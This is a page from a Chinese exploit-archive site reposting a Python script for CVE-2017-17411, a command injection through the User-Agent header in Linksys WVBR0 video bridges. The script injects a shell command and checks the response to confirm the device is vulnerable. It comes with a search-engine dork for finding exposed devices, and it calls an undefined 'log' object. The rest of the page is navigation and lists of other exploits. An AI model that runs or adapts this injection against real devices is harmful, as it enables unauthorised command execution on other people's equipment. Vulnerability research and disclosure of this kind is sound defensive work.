首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linksys WVBR0 - 'User-Agent' Remote Command Injection
来源:https://thehackernews.com/ 作者:nixawk 发布时间:2017-12-19  
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
 
"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
 
$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""
 
import requests
 
 
def check(url):
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum
 
    resp = send_http_request(url, payload)
 
    if not resp:
        return False
 
    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)
 
    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False
 
    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False
 
    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True
 
 
def send_http_request(url, payload):
    headers = {
        'User-Agent': payload
    }
 
    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)
 
    return response
 
 
if __name__ == '__main__':
    import sys
 
    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)
 
    check(sys.argv[1])
 
 
# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"
 
## References
 
# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·GoAhead httpd 2.5 < 3.6.5 - 'L
·WIndows jscript!JsArraySlice U
·Microsoft Windows jscript!RegE
·Outlook for Android - Attachme
·Windows jscript!NameTbl::GetVa
·CDex 1.96 - Buffer Overflow
·Microsoft Internet Explorer 11
·Linux kernel < 4.10.15 - Race
·Sync Breeze 10.2.12 - Denial o
·Microsoft Windows Array.sort j
·ITGuard-Manager 0.0.0.1 - Remo
·Microsoft Windows jscript!RegE
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved